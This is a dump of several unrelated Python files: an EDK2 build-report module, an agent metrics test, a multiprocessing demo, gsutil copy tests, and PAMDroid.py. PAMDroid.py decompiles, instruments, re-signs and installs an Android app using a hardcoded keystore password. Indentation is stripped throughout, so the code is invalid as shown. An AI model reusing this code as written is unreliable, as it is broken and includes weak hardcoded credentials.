FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid)
self.VPDBaseAddress = 0
self.VPDSize = 0
self.VPDInfoList = []
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
if os.path.isfile(self.VpdFilePath):
fd = open(self.VpdFilePath, "r")
Lines = fd.readlines()
for Line in Lines:
Line = Line.strip()
if len(Line) == 0 or Line.startswith("#"):
continue
try:
PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|")
PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip()
if Offset.lower().startswith('0x'):
Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress)
else:
Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress)
self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value))
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath)
fd.close()
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if len(self.VPDInfoList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in self.VPDInfoList:
ValueList = item.split('|')
Value = ValueList[-1].strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
ValueList[-1] = ' {'
FileWrite(File, '|'.join(ValueList))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
FileWrite(File, item)
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = StringIO('')
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
test_solr.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from types import ListType
import unittest
import mock
import os
from nose.plugins.attrib import attr
import logging
from aggregator import MetricsAggregator
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/sd-agent/collector.log',
'forwarder_log_file': '/var/log/sd-agent/forwarder.log',
'sdstatsd_log_file': '/var/log/sd-agent/sdstatsd.log',
'jmxfetch_log_file': '/var/log/sd-agent/jmxfetch.log',
'go-metro_log_file': '/var/log/sd-agent/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from sdstatsd import Server
from jmxfetch import JMXFetch
STATSD_PORT = 8127
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='solr')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'sdstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testTomcatMetrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 8, metrics)
self.assertEquals(len([t for t in metrics if 'instance:solr_instance' in t['tags'] and t['metric'] == "jvm.thread_count"]), 1, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
self.assertTrue(len([t for t in metrics if "solr." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
|
PAMDroid.py
|
import os
import instrumentation
import Monkey
from multiprocessing import Process
import pexpect
import sys
app = 'com.texty.sms'
analyticService = 'Crashlytics'
testPath = '/home/xueling/git/rose6icse/submissions/available/XuelingZhang/testAPP/'
# #decode the apk file into smali code
decodeCmd = "apktool d %s -o %s%s" % (testPath+app+'.apk', testPath, app)
print decodeCmd
os.system(decodeCmd)
#perfomr corresponding intrumentation according to the analytic service
if analyticService == 'Tune':
instrumentation.tune(app, testPath)
if analyticService == 'Mixpanel':
instrumentation.mixpanel(app, testPath)
if analyticService == 'Branch':
instrumentation.branch(app, testPath)
if analyticService == 'Leanplum':
instrumentation.leanplum(app, testPath)
if analyticService == 'Crashlytics':
instrumentation.crashlytics(app, testPath)
if analyticService == 'Appsee':
instrumentation.appsee(app, testPath)
if analyticService == 'Applovin':
instrumentation.applovin(app, testPath)
if analyticService == 'Appsflyer':
instrumentation.appsflyer(app, testPath)
if analyticService == 'Firebase':
instrumentation.firebase(app, testPath)
if analyticService == 'Ironsource':
instrumentation.ironsource(app, testPath)
if analyticService == 'Flurry':
instrumentation.flurry(app, testPath)
if analyticService == 'GoogleAnalytics':
instrumentation.googleAnalytics(app, testPath)
if analyticService == 'Newrelic':
instrumentation.newrelic(app, testPath)
#rebuild
rm = "rm %s" %(testPath+app+'.apk')
os.system(rm)
rebuildCmd = "apktool b %s -o %s" % (testPath+app, testPath+app+'_1.apk')
os.system(rebuildCmd)
#Generate key for app
KeyGenCmd = "keytool -genkey -alias abc.keystore -keyalg RSA -validity 20000 -keystore %s%s"%(testPath, app+'.keystore')
print KeyGenCmd
child = pexpect.spawn(KeyGenCmd, logfile = sys.stdout)
#password
try:
if(child.expect([pexpect.TIMEOUT, 'password'])):
child.sendline('123456')
except:
print (str(child))
#re-enter password
try:
if (child.expect([pexpect.TIMEOUT, 'Re-enter'])):
child.sendline('123456')
except:
print (str(child))
# last name
try:
if (child.expect([pexpect.TIMEOUT, 'last'])):
child.sendline('zhang')
except:
print (str(child))
# unit
try:
if (child.expect([pexpect.TIMEOUT, 'unit'])):
child.sendline('utsa')
except:
print (str(child))
# organization
try:
if (child.expect([pexpect.TIMEOUT, 'organization'])):
child.sendline('utsa')
except:
print (str(child))
# city
try:
if (child.expect([pexpect.TIMEOUT, 'City'])):
child.sendline('SA')
except:
print (str(child))
# state
try:
if (child.expect([pexpect.TIMEOUT, 'State'])):
child.sendline('Tx')
except:
print (str(child))
# country code
try:
if (child.expect([pexpect.TIMEOUT, 'country code'])):
child.sendline('01')
except:
print (str(child))
# correct?
try:
if (child.expect([pexpect.TIMEOUT, 'correct'])):
child.sendline('y')
except:
print (str(child))
# RETURN
try:
if (child.expect([pexpect.TIMEOUT, 'RETURN'])):
child.sendline('\n')
except:
print (str(child))
try:
child.expect([pexpect.TIMEOUT, pexpect.EOF])
except:
print (str(child))
# assign the key to the new apk file
assignCmd = "jarsigner -verbose -keystore %s%s -storepass 123456 -signedjar %s%s %s%s abc.keystore" %(testPath, app+'.keystore',testPath,app+'.apk', testPath, app+'_1.apk')
print assignCmd
child = pexpect.spawn(assignCmd, logfile = sys.stdout)
#password
try:
if(child.expect([pexpect.TIMEOUT, 'password'])):
child.sendline('123456')
except:
print (str(child))
try:
child.expect([pexpect.TIMEOUT, pexpect.EOF])
except:
print (str(child))
###install the app and run GUI test, make sure your mobile device in connected to the computer
cmd_install = 'adb install ' + testPath + app + '.apk'
print cmd_install
os.system(cmd_install)
cmd_logcat_c = 'adb logcat -c'
print cmd_logcat_c
os.system(cmd_logcat_c)
cmd_logcat_out = 'adb logcat > ' + testPath + app +'.log'
print cmd_logcat_out
print 'please perform UI test............'
p = Process(target= Monkey.getUserInput(app, testPath))
p.start()
os.system(cmd_logcat_out)
|
multi_sensors.py
|
#!/usr/bin/env python
#
# Copyright AlertAvert.com (c) 2013. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Demonstrates the use of multi-processing for infinite streams of data.
Many producers (``Sensor`` objects) will generate an infinite stream of data that will be
queued for a single consumer to analyze and take action on.
"""
from __future__ import print_function
__author__ = 'marco'
import argparse
import multiprocessing as mp
import os
import time
from sensors import Sensor
# FIXME: Globals are evil, avoid in real production code
pid_file = '/tmp/multi_sensors.pid'
pid_file_lock = mp.Lock()
console_lock = mp.Lock()
def log(msg):
with console_lock:
print(msg)
def producer(queue, delay=0.500):
""" It will forever put the sensor's readings onto the queue
:param queue: the queue to push sensor data to
:param delay: between readings
:return: None
"""
with pid_file_lock:
with open(pid_file, mode='a') as pid:
pid.write('{}\n'.format(os.getpid()))
log("[{}] producer started".format(os.getpid()))
sensor = Sensor(faulty_pct=30.0)
try:
for value in sensor.get():
queue.put(value)
time.sleep(delay)
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
def consumer(queue, idx, threshold=5, shared=None):
""" Reads values from the queue and raises an alarm
More than ```threshold``` consecutive values that are True will trigger an alarm.
:param queue: the queue to read from
:param threshold: The threshold at which we trigger the alarm, across ALL monitors
:param shared: an optional shared ```Value`` for multiple Monitors
:type shared: multiprocessing.Value
:return: never, unless the threshold is exceeded
"""
log("[monitor: {}] Started with threshold {}".format(os.getpid(), threshold))
count = 0
try:
while shared.value < threshold:
reading = queue.get(block=True)
if reading:
count += 1
log('Alerting: {}'.format(count))
else:
# reset the counter
count = 0
if shared is not None:
with shared.get_lock():
# NOTE: the double-check, as things may have changed between the test on the
# while and here; not doing this, causes some monitors to never terminate
if count == 0 and shared.value < threshold:
shared.value = 0
else:
shared.value += count
log("[monitor-{}] Threshold exceeded - exiting".format(idx))
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
def main(conf):
# FIXME: poor man's MP pool - use multiprocessing.Pool in real production code
sensors_pool = []
monitors_pool = []
queue = mp.Queue()
# Shared memory, to share state between processes - this is best left to the experts!
shared_value = mp.Value('i', 0)
for k in range(conf.monitors):
monitor = mp.Process(target=consumer, name="Monitor",
args=(queue, k, conf.threshold, shared_value))
monitors_pool.append(monitor)
monitor.start()
for i in range(conf.sensors):
proc_name = 'Proc-{}'.format(i)
process = mp.Process(target=producer, name=proc_name, args=(queue,))
process.start()
sensors_pool.append(process)
log("[main: {}] waiting for {} monitors to complete (when threshold is exceeded)"
.format(os.getpid(), conf.monitors))
try:
for monitor in monitors_pool:
monitor.join()
except KeyboardInterrupt:
# User pressed Ctrl-C, safe to ignore
pass
for process in sensors_pool:
process.terminate()
with pid_file_lock:
os.remove(pid_file)
log("[main: {}] finished".format(os.getpid()))
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--sensors', type=int, default=10,
help="Number of sensors to activate")
parser.add_argument('--threshold', required=False, default=2, type=int,
help="Alarm threshold")
parser.add_argument('--monitors', type=int, default=1,
help="Number of monitoring processes")
return parser.parse_args()
if __name__ == "__main__":
config = parse_args()
main(config)
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib import exception
from gslib import name_expansion
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.exception import InvalidUrlError
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.hashing_helper import GetMd5
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
# The first variable below can be used to help debug the test if there is a
# problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
cls.assertEquals(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
cls.assertEquals(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
# Move objects one at a time to avoid listing consistency.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
